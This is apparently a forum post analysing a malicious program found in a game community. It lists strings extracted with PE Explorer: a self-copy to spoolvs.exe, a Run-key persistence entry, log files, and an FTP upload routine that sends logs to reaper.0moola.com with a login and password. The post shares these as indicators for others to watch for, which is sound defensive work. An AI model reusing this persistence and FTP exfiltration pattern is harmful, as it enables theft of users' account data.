Here's a list of the strings in the program exported from PE Explorer.
It may give you guys some idea of what to look for in the future.
@EleventySeven11: good job picking up on the spoolvs file. I didn't catch that but I recognized FTP access going on.
Interesting parts:
Code:
00443120: 'C:\Program Files\Internet Explorer\spoolvs.exe',0
00443164: 'Software\Microsoft\Windows\CurrentVersion\Run',0
00443192: 'spoolvs',0
0044319A: 'USERDOMAIN',0
004431F5: '-Log.txt',0
004431FE: 'OPEN reaper.0moola.com',0Ah,0
00443216: 'USER reaper.0moola.com',0Ah,0
0044322E: 'parrots',0Ah,0
00443237: 'ASCII',0Ah,0
0044323E: 'SEND ',0
00443244: 'BYE',0Ah,0
00443249: 'exit',0Ah,0
00443250: 'C:\WINDOWS\system32\system.bat',0
00443270: 'ftp -n -i -s:C:\WINDOWS\system32\drivers\config.sys',0Ah,0
004432A5: 'bye',0Ah,0
004432AC: 'C:\WINDOWS\system32\syssvr.bat',0
004432CC: 'C:\WINDOWS\system32\update.bat',0
004432EC: 'C:\Program Files\Conquer 2.0\log',0
0044330D: 0Ah,'-------SERVER_LOG-----------',0
0044332B: '---------END_LOG------------',0